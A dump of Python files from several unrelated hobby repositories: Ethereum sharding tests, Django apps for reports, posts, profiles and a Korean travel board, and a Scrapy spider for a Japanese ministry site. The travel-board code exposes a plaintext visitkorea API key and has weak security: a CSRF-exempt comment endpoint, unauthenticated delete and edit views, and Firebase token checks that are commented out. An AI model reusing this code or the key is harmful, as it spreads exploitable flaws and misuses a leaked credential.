assert 0 == utils.big_endian_to_int(call_sample(state, 0))
assert call_validation_code(state, k0_valcode_addr, withdraw_hash, sign(withdraw_hash, t.k0))
def test_call_add_header_get_shard_head(chain):
state = chain.head_state
def get_colhdr(shard_id, parent_collation_hash, collation_coinbase=t.a0):
period_length = 5
expected_period_number = num_blocks // period_length
b = chain.chain.get_block_by_number(expected_period_number * period_length - 1)
period_start_prevhash = b.header.hash
tx_list_root = b"tx_list " * 4
post_state_root = b"post_sta" * 4
receipt_root = b"receipt " * 4
sighash = utils.sha3(
rlp.encode([
shard_id, expected_period_number, period_start_prevhash,
parent_collation_hash, tx_list_root, collation_coinbase,
post_state_root, receipt_root
])
)
sig = sign(sighash, t.k0)
return rlp.encode([
shard_id, expected_period_number, period_start_prevhash,
parent_collation_hash, tx_list_root, collation_coinbase,
post_state_root, receipt_root, sig
])
shard0_genesis_colhdr_hash = utils.encode_int32(0)
colhdr = get_colhdr(0, shard0_genesis_colhdr_hash)
colhdr_hash = utils.sha3(colhdr)
assert call_get_shard_head(state, 0) == shard0_genesis_colhdr_hash
# register t.k0 as the validators
k0_valcode_addr = deploy_contract(state, t.k0, mk_validation_code(t.a0))
tx = call_deposit(state, t.k0, deposit_size, k0_valcode_addr, t.a2)
deploy_tx(state, tx)
# `add_header` verifies whether the colhdr is signed by the current
# selected validator, using `sample`
tx = call_add_header(state, t.k0, 0, colhdr)
deploy_tx(state, tx)
assert colhdr_hash == call_get_shard_head(state, 0)
def test_valmgr_addr_in_sharding_config():
assert sharding_config['VALIDATOR_MANAGER_ADDRESS'] == \
utils.checksum_encode(get_valmgr_addr())
|
[
"/sharding/collator.py",
"/sharding/config.py",
"/sharding/main_chain.py",
"/sharding/shard_chain.py",
"/sharding/tests/test_collator.py",
"/sharding/tests/test_main_chain.py",
"/sharding/tests/test_shard_chain.py",
"/sharding/tests/test_state_transition.py",
"/sharding/tests/test_validator_manager.py",
"/sharding/tests/test_validator_manager_utils.py"
] |
01kazu/tongue
|
from django.contrib import admin
from .models import Report
class ReportAdmin(admin.ModelAdmin):
readonly_fields = ('date',)
# Register your models here.
admin.site.register(Report, ReportAdmin)
--- FILE SEPARATOR ---
from django.apps import AppConfig
from .models import Report
class ReportsConfig(AppConfig):
name = 'reports'
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-11-28 10:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('reports', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='report',
name='date',
field=models.DateField(default=django.utils.timezone.now),
preserve_default=False,
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-12-01 07:41
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('reports', '0002_report_date'),
]
operations = [
migrations.RenameField(
model_name='report',
old_name='context',
new_name='post',
),
migrations.RemoveField(
model_name='report',
name='slug',
),
migrations.AlterField(
model_name='report',
name='date',
field=models.DateTimeField(verbose_name=datetime.datetime(2019, 12, 1, 7, 41, 13, 304781, tzinfo=utc)),
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-12-01 22:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reports', '0004_auto_20191201_2204'),
]
operations = [
migrations.AlterField(
model_name='report',
name='user',
field=models.CharField(max_length=30),
),
]
--- FILE SEPARATOR ---
# Generated by Django 2.2.1 on 2019-12-02 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reports', '0005_auto_20191201_2358'),
]
operations = [
migrations.AddField(
model_name='report',
name='title',
field=models.CharField(blank=True, max_length=50),
),
]
--- FILE SEPARATOR ---
from django.conf import settings
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils import timezone
# User = settings.AUTH_USER_MODEL
# Create your models here.
class Report(models.Model):
user = models.CharField(max_length=30)
title = models.CharField(max_length=50)
post = models.TextField()
date = models.DateTimeField(auto_now=True)
def get_absolute_url(self):
return reverse("reports:all_posts_detail", kwargs={'pk': self.pk})
# class Profile(models.Model):
# user = models.OneToOneField(User, on_delete=models.CASCADE)
# matric_number = models.CharField(max_length=17)
# @receiver(post_save, sender=User)
# def create_user_profile(sender, instance, created, **kwargs):
# if created:
# Profile.objects.create(user=instance)
# @receiver(post_save, sender=User)
# def save_user_profile(sender, instance, **kwargs):
# instance.profile.save()
--- FILE SEPARATOR ---
from django.urls import path, include
from . import views
from django.contrib.auth import views as auth_views
from .views import AllPosts, AllPostsDetail
app_name = "reports"
urlpatterns = [
# path('', views.home, name='home'),
path('', views.login_user, name='login_user'),
path('activate/<str:uidb64>/<str:token>/', views.activate_account, name='activate'),
path('accounts/', include('django.contrib.auth.urls')),
path('sign-up', views.signup, name='register_user'),
path("welcome", views.welcome, name='welcome'),
path("activate-email", views.activate_email, name='activate_email'),
path("all-posts", AllPosts.as_view(), name="all_posts"),
path('all-posts/<int:pk>', AllPostsDetail.as_view(), name="all_posts_detail"),
path('logout', views.logout_user, name="logout_user")
]
--- FILE SEPARATOR ---
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import login, authenticate, update_session_auth_hash, logout
from .forms import SignUpForm, ReportForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
from django.contrib.auth.models import User
from django.core.mail import EmailMessage
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, View
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import Report
activate_email_info = ""
def home(request):
return render(request, 'home.html')
def index(request):
pass
def signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
# profile.save()
user.is_active = False
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your account.'
message = render_to_string('reports/html/activate_account.html', {
'user': user,
'domain': current_site.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
email = EmailMessage(
mail_subject, message, to=[to_email]
)
email.send()
print(type(user.pk))
uid = urlsafe_base64_encode(force_bytes(user.pk))
print(force_bytes(urlsafe_base64_decode(uid)))
activate_email_info = 'We have sent you an email, please confirm your email address to complete registration'
return render(request, 'reports/html/confirm_email.html', {"active": activate_email_info})
# 'We have sent you an email, please confirm your email address to complete registration'
else:
form = SignUpForm()
return render(request, 'reports/html/signup.html', {'form': form})
def activate_email(request):
return render(request, 'reports/html/confirm_email.html', {"active": activate_email_info})
#activate account
def activate_account(request, uidb64, token, backend='django.contrib.auth.backends.ModelBackend'):
print(uidb64)
print(token)
try:
uid = urlsafe_base64_decode(uidb64).decode()
user = User.objects.get(pk=uid)
print(account_activation_token.check_token(user, token))
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.save()
login(request, user, backend='django.contrib.auth.backends.ModelBackend')
activate_success = 'Your account has been activated successfully'
return render(request, 'reports/html/confirm_email.html', {"active": activate_success})
else:
activate_failure = 'Activation link is invalid!'
return render(request, 'reports/html/confirm_email.html', {"active": activate_failure})
def password_reset(request):
return render(request, 'reports/html/registration/password_reset_form.html')
def login_user(request):
print(request)
print(request.POST)
print(dir(request))
error=""
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user:
if user.is_active:
login(request, user)
return HttpResponseRedirect(reverse("reports:welcome"))
else:
return render(request, "registration/login.html")
else:
error = "Username and Password do not match. Try again"
return render(request, "reports/html/login.html", { "error" : error } )
@login_required
def welcome(request):
# print(dir(request.user))
if request.method == "POST":
form = ReportForm(request.POST)
form.user = request.user.username
print("hello")
print(dir(request))
if form.is_valid():
form = form.save(commit=False)
form.user = request.user.username
form.save()
return redirect("reports:all_posts")
else:
form = ReportForm()
return render(request, "reports/html/welcome.html" , {"form" :form})
@login_required
def logout_user(request):
logout(request)
return HttpResponseRedirect(reverse("reports:login_user"))
# @login_required
class AllPosts(ListView, LoginRequiredMixin):
model = Report
context_object_name = 'post_list'
template_name = "reports/html/all_posts.html"
ordering = ['-date']
paginate_by = 10
login_url = ''
class AllPostsDetail(View, LoginRequiredMixin):
login_url = ''
def get(self, request, pk):
post_detail = Report.objects.get(pk=pk)
return render(request, 'reports/html/all_posts_detail.html', {'post_detail': post_detail})
|
[
"/reports/admin.py",
"/reports/apps.py",
"/reports/migrations/0002_report_date.py",
"/reports/migrations/0003_auto_20191201_0841.py",
"/reports/migrations/0005_auto_20191201_2358.py",
"/reports/migrations/0006_report_title.py",
"/reports/models.py",
"/reports/urls.py",
"/reports/views.py"
] |
01kingmaker01/vrepo-backend-django
|
import firebase_admin
from firebase_admin import credentials
from firebase_admin import auth
cred = credentials.Certificate(r'D:\project\___VIT___\vit\api\firebase\key.json')
firebase_admin.initialize_app(cred)
def simple_middleware(get_response):
def middleware(request):
# try:
# token = request.headers['Authorization']
# decoded_token = auth.verify_id_token(token)
# print(decoded_token)
# # uid = decoded_token['uid']
# except :
# print("No Auth")
response = get_response(request)
return response
return middleware
--- FILE SEPARATOR ---
from rest_framework.pagination import CursorPagination
from rest_framework.response import Response
class PostCursorPagination(CursorPagination):
page_size =5
cursor_query_param = 'c'
ordering = '-id'
--- FILE SEPARATOR ---
from django.db.models import fields
from django.db.models.base import Model
from rest_framework import serializers
from .models import Post
class PostsSerializer(serializers.ModelSerializer):
class Meta:
model = Post
fields = '__all__'
--- FILE SEPARATOR ---
from django.urls import path, include
from .import views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
path('posts/',views.PostCreate.as_view()),
path('posts/<int:id>',views.PostView.as_view()),
path('update/<int:id>',views.PostUpdateDelete.as_view()),
]
--- FILE SEPARATOR ---
from .serializers import *
from django.shortcuts import redirect, render
from . models import Post
#import rest framwork components
from rest_framework import serializers
from rest_framework.generics import ListCreateAPIView,RetrieveAPIView, DestroyAPIView, RetrieveUpdateDestroyAPIView
from . paginations import PostCursorPagination
# Create your views here.
# @api_view(['GET', 'POST'])
# def hello_world(request):
# if request.method == 'POST':
# return Response({"message": "Got some data!", "data": request.data})
# return Response({"message": "Hello, world!"})
class PostCreate(ListCreateAPIView):
queryset = Post.objects.all()
serializer_class = PostsSerializer
pagination_class = PostCursorPagination
class PostView(RetrieveAPIView):
queryset = Post.objects.all()
serializer_class = PostsSerializer
lookup_field = 'id'
pagination_class = PostCursorPagination
class PostUpdateDelete(RetrieveUpdateDestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostsSerializer
lookup_field = 'id'
pagination_class = PostCursorPagination
|
[
"/api/firebase/middleware.py",
"/api/paginations.py",
"/api/serializers.py",
"/api/urls.py",
"/api/views.py"
] |
01mokuba/soumu_scrapy
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ArchiveItem(scrapy.Item):
links = scrapy.Field()
month = scrapy.Field()
class ClipItem(scrapy.Item):
src = scrapy.Field()
text = scrapy.Field()
attachments = scrapy.Field()
file_urls = scrapy.Field()
files = scrapy.Field()
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from soumu_scrapy.items import ArchiveItem, ClipItem
class ArchiveSpider(CrawlSpider):
name = 'archive'
allowed_domains = ['www.soumu.go.jp'] #対象ドメイン
start_urls = ['http://www.soumu.go.jp/menu_news/s-news/index.html'] #開始URL
custom_settings = {
'DOWNLOAD_DELAY' : 1,
}
rules = (
Rule(
LinkExtractor(
allow=['http://www.soumu.go.jp/menu_news/s-news/[\d]+m\.html'], #リンク抽出をするURL - 月ごとの報道資料一覧
restrict_xpaths=['//div[@class=\'contentsBody\']'] #リンク抽出をするエリア
),
callback='parse_archive_list', #リンク抽出後に実行されるコールバック
follow=True
),
Rule(
LinkExtractor(
allow=['http://www.soumu.go.jp/menu_news/s-news/[\d\w]+\.html'], #リンク抽出をするURL - 報道資料詳細
restrict_xpaths=['//div[@class=\'contentsBody\']'] #リンク抽出をするエリア
),
callback='parse_archive_detail', #リンク抽出後に実行されるコールバック
follow=True
)
)
def parse_archive_list(self, response):
item = ArchiveItem()
item['links'] = []
item['month'] = response.url.split('/')[-1].replace('m.html','') #抽出した月 例: 1809
for linkitem in response.xpath('//div[@class=\"contentsBody\"]//a'): # メインコンテンツ内のリンクのリストでループ
item['links'].append({
'href' : linkitem.xpath('@href').extract_first(), #URLを抽出
'text' : linkitem.xpath('text()').extract_first() #アンカーテキストを抽出
})
return item
def parse_archive_detail(self, response):
item = ClipItem()
item['src'] = response.xpath('//body').extract_first()
content_root = response.xpath('//div[@class=\'contentsBody\']')
item['text'] = content_root.extract_first()
item['attachments'] = []
item['file_urls'] = []
for d in response.xpath('//a'): #responseのaタグでループ
dd = d.xpath('@href').extract_first() #hrefの値を抽出
if dd is not None: #hrefの値が存在する場合
if re.match('^https?://', dd) is None: #URLにhttp[s]が含まれていない場合
dd = response.urljoin(dd) #responseのベースURLを組み合わせて完全なURLを作る
if re.match('.*\.[Pp][Dd][Ff]$', dd) is not None: #大文字/小文字のPDF/pdfがURL内に存在するとき
item['attachments'].append({
'href': dd,
'text': d.xpath('text()').extract_first()
})
item['file_urls'].append(dd)
return item
|
[
"/soumu_scrapy/items.py",
"/soumu_scrapy/spiders/archive.py"
] |
01shobitha/collabmate
|
from django.contrib import admin
from .models import Language, Profile, LanguageUser, Project
# Register your models here.
admin.site.register(Language)
admin.site.register(Project)
admin.site.register(LanguageUser)
admin.site.register(Profile)
--- FILE SEPARATOR ---
# Generated by Django 3.0 on 2020-12-01 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('collab', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('proj_name', models.CharField(max_length=100)),
('description', models.TextField(blank=True, max_length=700)),
('git_hub_link', models.TextField(blank=True, max_length=1000)),
('proj_link', models.TextField(blank=True, max_length=1000)),
],
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
#language
class Language(models.Model):
lang_name = models.CharField(max_length=100)
class Meta:
ordering = ['lang_name']
#languageUser
class LanguageUser(models.Model):
land_id = models.ForeignKey(Language, on_delete=models.CASCADE)
user_id = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return f'{self.pk}'
#Project
class Project(models.Model):
proj_name = models.CharField(max_length=100)
description = models.TextField(max_length = 700, blank = True)
git_hub_link = models.TextField(max_length = 1000, blank = True)
proj_link = models.TextField(max_length = 1000, blank = True)
#Profile
class Profile(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE)
bio = models.TextField(max_length = 500, blank = True)
Language = models.ForeignKey(Language, on_delete=models.CASCADE)
def __str__(self):
return f'{self.pk}'
--- FILE SEPARATOR ---
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('details/<slug:username>/',views.details,name= 'details'),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
def index(request):
greeting = "Hai! page is working"
username = request.user.username
searched_item = request.GET.get('search_people')
# if not searched_item:
# searched_item = "no results found"
print(searched_item)
context = {
'greeting': greeting,
'username': username,
'searched_item': searched_item,
}
return render(request,'index.html', context = context)
def details(request, username):
name = request.user.username
if request.user.is_authenticated:
message = 'Hai, this is ' + username
else:
message = 'Login to view ' + username +'\'s page'
context = {
'name': name,
'message': message,
'username': username,
}
return render(request, 'details.html', context = context)
|
[
"/collab/admin.py",
"/collab/migrations/0002_project.py",
"/collab/models.py",
"/collab/urls.py",
"/collab/views.py"
] |
01stone/GetawayTeam
|
from django.contrib import admin
from getaway import models
# 코멘트를 어드민으로 관리해보자
class CommentAdmin(admin.ModelAdmin):
list_display = (
'c_board',
'c_content',
'c_user',
'c_pubdate',
'c_like',
)
search_fields = ('c_board__title', 'c_content', 'c_user__user_id',)
# 모델에서 수정한 DefUser, admin 댓글 관리 추가
admin.site.register(models.Board)
admin.site.register(models.Tour)
admin.site.register(models.TourComment)
admin.site.register(models.Comment, CommentAdmin)
--- FILE SEPARATOR ---
import requests
from bs4 import BeautifulSoup
whole_area = {'서울': '1', '인천': '2', '대전': '3', '대구': '4', '광주': '5', '부산': '6', '울산': '7', '세종': '8', '경기': '31', '강원': '32', '충북': '33', '충남': '34', '경북': '35', '경남': '36', '전북': '37', '전남': '38', '제주': '39'}
Seoul_area = ['강남구', '강동구', '강북구', '강서구', '관악구', '광진구', '구로구', '금천구', '노원구', '도봉구', '동대문구', '동작구', '마포구', '서대문구', '서초구', '성동구', '성북구', '송파구', '양천구', '영등포구', '용산구', '은평구', '종로구', '중구', '중랑구']
Incheon_area = ['강화군', '계양구', '미추홀구', '남동구', '동구', '부평구', '서구', '연수구', '옹진군', '중구']
Daejeon_area = ['대덕구', '동구', '서구', '유성구', '중구']
Daegu_area = ['남구', '달서구', '달성군', '동구', '북구', '서구', '수성구', '중구']
Gwangju_area = ['광산구', '남구', '동구', '북구', '서구']
Busan_area = ['강서구', '금정구', '기장군', '남구', '동구', '동래구', '부산진구', '북구', '사상구', '사하구', '서구', '수영구', '연제구', '영도구', '중구', '해운대구']
Ulsan_area = ['중구', '남구', '동구', '북구', '울주군']
Sejong_area = ['세종특별자치시']
Gyeonggi_area = ['가평군', '고양시', '과천시', '광명시', '광주시', '구리시', '군포시', '김포시', '남양주시', '동두천시', '부천시', '성남시', '수원시', '시흥시', '안산시', '안성시', '안양시', '양주시', '양평군', '여주시', '연천군', '오산시', '용인시', '의왕시', '의정부시', '이천시', '파주시', '평택시', '포천시', '하남시']
Gangwon_area = ['강릉시', '고성군', '동해시', '삼척시', '속초시', '양구군', '양양군', '영월군', '원주시', '인제군', '정선군', '철원군', '춘천시', '태백시', '평창군', '홍천군', '화천군', '횡성군']
Chungbuk_area = ['괴산군', '단양군', '보은군', '영동군', '옥천군', '음성군', '제천시', '진천군', '청원군', '청주시', '충주시', '증평군']
Chungnam_area = ['공주시', '금산군', '논산시', '당진시', '보령시', '부여군', '서산시', '서천군', '아산시', '예산군', '천안시', '청양군', '태안군', '홍성군', '계룡시']
Gyeongbuk_area = ['경산시', '경주시', '고령군', '구미시', '군위군', '김천시', '문경시', '봉화군', '상주시', '성주군', '안동시', '영덕군', '영양군', '영주시', '영천시', '예천군', '울릉군', '울진군', '의성군', '청도군', '청송군', '칠곡군', '포항시']
Gyeongnam_area = ['거제시', '거창군', '고성군', '김해시', '남해군', '마산시', '밀양시', '사천시', '산청군', '양산시', '의령군', '진주시', '진해시', '창녕군', '창원시', '통영시', '하동군', '함안군', '함양군', '합천군']
Jeonbuk_area = ['고창군', '군산시', '김제시', '남원시', '무주군', '부안군', '순창군', '완주군', '익산시', '임실군', '장수군', '전주시', '정읍시', '진안군']
Jeonnam_area = ['강진군', '고흥군', '곡성군', '광양시', '구례군', '나주시', '담양군', '목포시', '무안군', '보성군', '순천시', '신안군', '여수시', '영광군', '영암군', '완도군', '장성군', '장흥군', '진도군', '함평군', '해남군', '화순군']
Jeju_area = ['남제주군', '북제주군', '서귀포시', '제주시']
url = 'http://api.visitkorea.or.kr/openapi/service/rest/KorService/areaCode'
queryParams = '?' + 'ServiceKey=' + 'lA29%2FannvhdQHnNE4mon7ZoyNq0ue6P%2FPnYQuFsfaZ7D8YedR6DOISotomyacj0u15iLaCeruqZUsGe%2F79DpRA%3D%3D' \
+ '&MobileOS=' + 'ETC' \
+ '&MobileApp=' + 'AppTest' \
+ '&areaCode=' + '35'\
+ '&numOfRows=' + '32'
url = url + queryParams
result = requests.get(url)
bs_obj = BeautifulSoup(result.content, "html.parser")
print(bs_obj)
url2 = 'http://api.visitkorea.or.kr/openapi/service/rest/KorService/areaBasedList'
queryParams2 = '?' + 'ServiceKey=' + 'lA29%2FannvhdQHnNE4mon7ZoyNq0ue6P%2FPnYQuFsfaZ7D8YedR6DOISotomyacj0u15iLaCeruqZUsGe%2F79DpRA%3D%3D' \
+ '&MobileOS=' + 'ETC' \
+ '&MobileApp=' + 'AppTest' \
+ '&areaCode=' + '1'
url2 = url2 + queryParams2
result2 = requests.get(url2)
bs_obj2 = BeautifulSoup(result2.content, "html.parser")
print(bs_obj2)
print(bs_obj2.find("addr1"))
area = list()
for data in bs_obj.find_all("name"):
area.append(data.text)
print(area)
--- FILE SEPARATOR ---
from django import forms
from .models import *
class BoardForm(forms.ModelForm):
class Meta:
model = Board
fields = ['b_title', 'b_content'] # 유저와 연동되어 써야하기 때문에 b_writer 를 제외 시켰음.
# fields = ['b_title', 'b_writer', 'b_content'] # create 페이지에 보여줄 것들만 명시!
# Form 으로 코멘트 처리
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ['c_user', 'c_content']
# labels = {
# 'content': '댓글내용',
# }
--- FILE SEPARATOR ---
# Generated by Django 2.2.5 on 2021-08-13 02:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Board',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('b_title', models.CharField(max_length=100)),
('b_content', models.TextField(max_length=3000)),
('b_like', models.IntegerField(default=0)),
('b_comment', models.IntegerField(default=0)),
('b_pubdate', models.DateTimeField(auto_now=True)),
('b_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='user_board', to=settings.AUTH_USER_MODEL)),
('b_voter', models.ManyToManyField(blank=True, related_name='voter_board', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Tour',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('t_name', models.CharField(max_length=50)),
('t_like', models.IntegerField(default=0)),
('t_dis', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='TourComment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tc_userID', models.CharField(max_length=20)),
('tc_content', models.TextField(max_length=1000)),
('tc_pubdate', models.DateTimeField(auto_now=True)),
('tc_tour', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='getaway.Tour')),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('c_content', models.TextField(max_length=1000)),
('c_like', models.IntegerField(default=0)),
('c_pubdate', models.DateTimeField(auto_now=True)),
('c_board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='getaway.Board')),
('c_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
--- FILE SEPARATOR ---
from django.contrib.auth.models import User
from django.db import models
class Board(models.Model):
b_title = models.CharField(max_length=100) # 게시판 제목
b_content = models.TextField(max_length=3000) # 게시판 내용
b_like = models.IntegerField(default=0) # 게시판 좋아요 개수
b_comment = models.IntegerField(default=0) # 게시판 댓글 개수
b_pubdate = models.DateTimeField(auto_now=True) # 게시판 게시글 업로드 날짜
b_user = models.ForeignKey(User, on_delete=models.DO_NOTHING, null=True, related_name='user_board')
b_voter = models.ManyToManyField(User, related_name='voter_board', blank=True) # 추천인 추가, Many-To-Many 중복 좋아요 방지
def like_count(self): # total user count
return self.b_voter.count()
def __str__(self):
return self.b_title
class Comment(models.Model):
c_content = models.TextField(max_length=1000) # 댓글 내용
c_user = models.ForeignKey(User, on_delete=models.CASCADE) # 댓글 쓴 유저
c_like = models.IntegerField(default=0) # 댓글 좋아요
c_pubdate = models.DateTimeField(auto_now=True) # 댓글 작성일
c_board = models.ForeignKey(Board, on_delete=models.CASCADE) # 이 댓글이 달린 게시글!
def __str__(self):
return self.c_content
class Tour(models.Model):
t_name = models.CharField(max_length=50)
t_like = models.IntegerField(default=0)
t_dis = models.IntegerField(default=0)
def __str__(self):
return self.t_name
class TourComment(models.Model):
tc_userID = models.CharField(max_length=20)
tc_content = models.TextField(max_length=1000)
tc_pubdate = models.DateTimeField(auto_now=True)
tc_tour = models.ForeignKey(Tour, on_delete=models.CASCADE)
def __str__(self):
return self.tc_content
# 이름을 임시로 DefUser 로 바꿈. 장고 고유 User 랑 겹치길래...
# class DefUser(models.Model):
# user_name = models.CharField(max_length=20)
# user_password = models.CharField(max_length=20)
# user_email = models.EmailField(max_length=40)
# user_phone = models.IntegerField()
# user_created = models.DateTimeField(auto_now=True)
#
# def __str__(self):
# return self.user_name
--- FILE SEPARATOR ---
from django.urls import path
from . import views
app_name = 'getaway' # set name space
urlpatterns = [
# http://localhost:8000
path('', views.home, name='home'),
path('<int:contentId>/', views.tour_detail, name='detail'),
# http://localhost:8000/list
path('list/', views.b_list, name='b_list'),
# http://localhost:8000/list/create
path('list/create/', views.b_create, name='b_create'),
path('detail/<int:board_id>/', views.b_detail, name='b_detail'),
path('modify/<int:board_id>/', views.b_modify, name='b_modify'),
path('detail/remove/<int:board_id>/', views.b_remove, name='b_remove'),
# 게시글 추천
path('detail/<int:board_id>/like/', views.b_like, name='b_like'),
# 회원가입/ 로그인/ 로그아웃
path('signup/', views.signup, name='signup'),
path('login/', views.login, name='login'),
path('logout/', views.logout, name='logout'),
# 댓글......
]
--- FILE SEPARATOR ---
from django.contrib.auth.hashers import check_password
from django.core.serializers import serialize
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_exempt
from .forms import *
from django.core.paginator import Paginator
from django.db.models import Q # for search function
from django.contrib import auth, messages
from django.contrib.auth.models import User
from django.http import HttpResponse, JsonResponse
import json
def b_list(request):
"""
게시판 리스트 출력 함수
"""
# 입력 파라미터
user_id = request.session.get('user')
print(user_id)
page = request.GET.get('page', 1) # 페이지
kw = request.GET.get('kw', '') # 검색어 for search function
# 조회
listing = Board.objects.all().order_by('-id')
if kw: # 이것도 for search function
listing = listing.filter(
Q(b_title__icontains=kw) | # 제목검색
Q(b_content__icontains=kw) # | # 내용검색
).distinct()
# 페이징 처리
paginator = Paginator(listing, 10) # 페이지당 10개씩 보여주기
page_obj = paginator.get_page(page)
# 검색 기능 넣고 Page and kw are included
context = {'listing': page_obj, 'page': page, 'kw': kw, 'user': user_id}
return render(request, 'getaway/list.html', context)
def b_create(request):
"""
게시글 작성
"""
if request.method == 'POST':
b_title = request.POST['b_title']
b_content = request.POST['b_content']
b_user = User.objects.get(pk=request.session.get('user'))
new_post = Board(
b_title=b_title,
b_content=b_content,
b_user=b_user,
)
new_post.save()
return redirect('getaway:b_list')
else:
board_form = BoardForm()
post = Board.objects.all()
context = {
'board_form': board_form,
'post': post
}
return render(request, 'getaway/create.html', context)
@csrf_exempt
def b_detail(request, board_id):
if request.method == 'POST':
if request.POST.get('what') == 'write_comment':
n_c_user = User.objects.get(pk=request.POST.get('writer'))
n_c_content = request.POST.get('content')
board = Board.objects.get(pk=request.POST['id'])
board.b_comment += 1
board.save()
new_comment = Comment(
c_user=n_c_user,
c_content=n_c_content,
c_board=board
)
new_comment.save()
comment = Comment.objects.select_related('c_board').filter(c_board_id=request.POST.get('id')).order_by('-c_pubdate')
writer = n_c_user.username
comment_data = json.loads(serialize('json', comment))
return JsonResponse({'comment': comment_data, 'writer': writer})
elif request.POST.get('what') == 'comment_bring':
comment = Comment.objects.select_related('c_board').filter(c_board_id=request.POST.get('id')).order_by('-c_pubdate')
comment_data = json.loads(serialize('json', comment))
username_data = {}
for username in comment_data:
username_data[username['fields']['c_user']] = User.objects.get(pk=username['fields']['c_user']).username
return JsonResponse({'comment': comment_data, 'username': username_data})
elif request.POST.get('what') == 'comment_delete':
d_comment = Comment.objects.get(pk=request.POST.get('id'))
d_comment.delete()
board = Board.objects.get(pk=request.POST.get('board_id'))
board.b_comment -= 1
board.save()
comment = Comment.objects.select_related('c_board').filter(c_board=request.POST.get('board_id')).order_by('-c_pubdate')
comment_data = json.loads(serialize('json', comment))
return JsonResponse({'comment': comment_data})
if request.method == 'GET':
user_id = request.session.get('user')
post = get_object_or_404(Board, pk=board_id)
comment_form = CommentForm()
context = {
'post': post,
'comment_form': comment_form,
'user': user_id
}
return render(request, 'getaway/detail.html', context)
def b_modify(request, board_id):
post = get_object_or_404(Board, pk=board_id)
if request.method == 'POST':
post.b_title = request.POST['title']
post.b_content = request.POST['content']
post.b_user = User.objects.get(pk=request.session.get('user'))
post.b_pubdate = request.POST['pubdate']
post.save()
return redirect('getaway:b_detail', board_id=post.id)
else:
context = {
'post': post
}
return render(request, 'getaway/modify.html', context)
def b_remove(request, board_id):
post = get_object_or_404(Board, pk=board_id)
post.delete()
return redirect('getaway:b_list')
def b_like(request, board_id):
"""
좋아요 (추천) 기능 view 함수
"""
user_id = request.session.get('user')
post = get_object_or_404(Board, pk=board_id)
if user_id is None:
messages.error(request, '로그인한 유저만 좋아요를 누를 수 있습니다.')
elif user_id == post.b_user.id:
messages.error(request, '본인이 작성한 글은 추천할수 없습니다')
elif post.b_voter.filter(id=user_id).exists():
post.b_voter.remove(user_id)
messages.error(request, '좋아요가 취소 되었습니다.')
else:
post.b_voter.add(User.objects.get(pk=user_id))
return redirect('getaway:b_detail', board_id)
# ----------------------------- 로긴
def signup(request):
if request.method == 'POST':
email = request.POST.get('email', None)
username = request.POST.get('username', None)
password = request.POST.get('password1', None)
re_password = request.POST.get('password2', None)
if not (email and username and password and re_password):
error = '모든 값을 입력해야 합니다.'
return render(request, 'getaway/signup.html', {'error': error})
elif password != re_password:
